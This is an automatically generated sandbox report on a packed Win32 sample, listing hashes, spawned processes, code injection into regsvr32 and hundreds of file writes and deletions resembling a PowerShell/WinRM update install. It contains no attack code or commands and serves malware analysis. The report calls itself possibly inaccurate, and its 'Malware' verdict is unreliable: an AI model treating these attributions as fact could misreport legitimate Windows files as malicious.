Sample_c10f9f83af

by malwarelabrobot on March 25th, 2016 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: c10f9f83af01bb34cebe94c30ce5049f
SHA1: 6390ea90ae3993901d24eacb3a2ec9eb92f6451b
SHA256: c817f212739603f131e152475cc6da97b5b4e16e8d8c7b05ce0114592acc6fa9
SSDeep: 6144:aZNutyPOSITHa4U6yUAu88SjTLU8DfsWRoerVbjn:AIb64UbPu8T0rU1jn
Size: 259127 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-12-19 17:29:09
Analyzed on: WindowsXP SP3 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

mofcomp.exe:2768
WindowsXP-KB968930-x86-ENG.exe:804
ngen.exe:4084
ngen.exe:3616
ngen.exe:3712
ngen.exe:3636
ngen.exe:3672
ngen.exe:252
ngen.exe:3652
ngen.exe:4092
ngen.exe:3576
ngen.exe:492
ngen.exe:364
ngen.exe:3628
ngen.exe:3600
ngen.exe:3660
ngen.exe:3608
ngen.exe:1796
ngen.exe:3524
ngen.exe:3644
ngen.exe:3720
ngen.exe:3704
ngen.exe:3560
ngen.exe:3680
ngen.exe:3548
%original file name%.exe:792
update.exe:304
mscorsvw.exe:3464
mscorsvw.exe:3456
mscorsvw.exe:3680
mscorsvw.exe:3532
mscorsvw.exe:2924
mscorsvw.exe:2700
mscorsvw.exe:2160
mscorsvw.exe:2756
mscorsvw.exe:3136
mscorsvw.exe:3336
mscorsvw.exe:3408
mscorsvw.exe:280
mscorsvw.exe:3816
mscorsvw.exe:1112
mscorsvw.exe:2940
PSCustomSetupUtil.exe:3868
PSCustomSetupUtil.exe:2844
PSCustomSetupUtil.exe:2924
PSCustomSetupUtil.exe:3140
PSCustomSetupUtil.exe:3004
PSCustomSetupUtil.exe:3060
PSCustomSetupUtil.exe:3308
PSCustomSetupUtil.exe:3736
PSCustomSetupUtil.exe:3164
PSCustomSetupUtil.exe:3232
PSCustomSetupUtil.exe:3028
PSCustomSetupUtil.exe:3104
PSCustomSetupUtil.exe:3256
PSCustomSetupUtil.exe:3892
PSCustomSetupUtil.exe:3844
PSCustomSetupUtil.exe:2872
PSCustomSetupUtil.exe:3768
PSCustomSetupUtil.exe:3936
PSCustomSetupUtil.exe:3984
PSCustomSetupUtil.exe:2972
PSCustomSetupUtil.exe:3284
PSCustomSetupUtil.exe:3788
PSCustomSetupUtil.exe:2896
PSCustomSetupUtil.exe:3192
PSCustomSetupUtil.exe:3960
PSCustomSetupUtil.exe:2792
PSSetupNativeUtils.exe:2068
regsvr32.exe:1976
regsvr32.exe:780
wsmanhttpconfig.exe:2740
wsmanhttpconfig.exe:2668

The Malware injects its code into the following process(es):

regsvr32.exe:436
regsvr32.exe:928

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mofcomp.exe:2768 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:804 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshmsg.dll (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.runtime.dll (33 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_automatic_variables.help.txt (14 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmpty.xsl (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_ise.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\eula.txt (586 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.dll (591 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll (1145 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_jobs.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spuninst.exe (3787 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_do.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_troubleshooting.help.txt (146 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ref.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\eventforwarding.adm (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_debuggers.help.txt (21 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\profile.ps1 (772 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_environment_variables.help.txt (417 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_operators.help.txt (770 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmanhttpconfig.exe (3009 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_profiles.help.txt (457 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (15909 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_aliases.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wmi_cmdlets.help.txt (8 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spupdsvc.exe (287 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\certificate.format.ps1xml (155 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssnapins.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_hash_tables.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_special_characters.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_faq.help.txt (775 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrs.exe (1154 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.exe (10748 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrshost.exe (22 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_switch.help.txt (489 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershellcore.format.ps1xml (1492 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmprovhost.exe (657 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.psd1 (950 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_continue.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parameters.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.inf (2457 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.mof (789 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (512 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comment_based_help.help.txt (595 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wildcards.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_signing.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\updspapi.dll (5940 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssessions.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll-help.xml (16567 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_while.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_job_details.help.txt (824 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\dotnettypes.format.ps1xml (266 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmplpxy.dll (603 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_requires.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_objects.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_syntax.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.resources.dll (9 bytes)
C:\$Directory (800 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll (5010 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arrays.help.txt (8 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_for.help.txt (146 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.dll (1842 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_properties.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_join.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrscmd.dll (2907 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.resources.dll (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_internationalization.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_requirements.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.format.ps1xml (16 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scripts.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_eventlogs.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_return.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comparison_operators.help.txt (11 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_precedence.help.txt (8 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_locations.help.txt (794 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_modules.help.txt (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshplugin.dll (802 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pssetupnativeutils.exe (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_line_editing.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_methods.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssession_details.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_foreach.help.txt (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrssrv.dll (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremotemanagement.adm (574 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.ini (1956 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmtxt.xsl (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parsing.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.exe (2526 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrsmgr.dll (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_try_catch_finally.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremoteshell.adm (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wtrinstaller.ico (4803 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_preference_variables.help.txt (37 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmwmipl.dll (2816 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_type_operators.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_format.ps1xml.help.txt (17 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_execution_policies.help.txt (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_trap.help.txt (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_break.help.txt (792 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_throw.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_providers.help.txt (59 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_prompts.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\getevent.types.ps1xml (15 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_assignment_operators.help.txt (379 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\importallmodules.psd1 (438 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_reserved_words.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\help.format.ps1xml (3947 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\$shtdwn$.req (788 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_path_syntax.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_quoting_rules.help.txt (659 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_types.ps1xml.help.txt (481 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pscustomsetuputil.exe (316 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmres.dll (6164 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_bits_cmdlets.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_if.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe.mui (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowspowershellhelp.chm (26041 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_logical_operators.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe (7339 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_regular_expressions.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_redirection.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_output.help.txt (887 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.resources.dll (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshsip.dll (24 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.dll (14450 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arithmetic_operators.help.txt (168 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spmsg.dll (495 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wevtfwd.dll (3351 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\diagnostics.format.ps1xml (590 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.mof (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.cmd (35 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_language_keywords.help.txt (11 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_split.help.txt (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\types.ps1xml (2510 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scopes.help.txt (76 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_variables.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.vbs (2727 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_escape_characters.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_methods.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\registry.format.ps1xml (20 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions.help.txt (586 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.resources.dll (3153 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_commonparameters.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershelltrace.format.ps1xml (344 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_blocks.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_transactions.help.txt (1011 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pipelines.help.txt (411 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\default.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_history.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.ver (14 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\spcustom.dll (23 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pspluginwkr.dll (1756 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_jobs.help.txt (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_data_sections.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\filesystem.format.ps1xml (133 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_core_commands.help.txt (221 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_session_configurations.help.txt (276 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsman.format.ps1xml (837 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll (38414 bytes)

The Malware deletes the following file(s):

C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_debuggers.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_automatic_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmpty.xsl (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\eula.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshmsg.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrssrv.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spuninst.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_methods.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_troubleshooting.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ref.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowspowershellhelp.chm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.runtime.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.psd1 (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_environment_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremotemanagement.adm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmanhttpconfig.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_profiles.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_aliases.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wmi_cmdlets.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spupdsvc.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.ini (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssnapins.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_hash_tables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_special_characters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_faq.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrs.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrshost.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershellcore.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmprovhost.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_continue.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parameters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.inf (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.mof (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comment_based_help.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wildcards.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrsmgr.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_signing.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\updspapi.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_while.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_language_keywords.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmplpxy.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_requires.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_objects.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_syntax.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_do.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arrays.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_for.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssessions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_properties.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_join.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrscmd.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_internationalization.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scripts.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_eventlogs.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_return.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comparison_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_precedence.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_locations.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_output.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshplugin.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\eventforwarding.adm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pssetupnativeutils.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_line_editing.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssession_details.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\help.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_foreach.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_jobs.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_break.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\certificate.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmtxt.xsl (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parsing.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.exe (0 bytes)
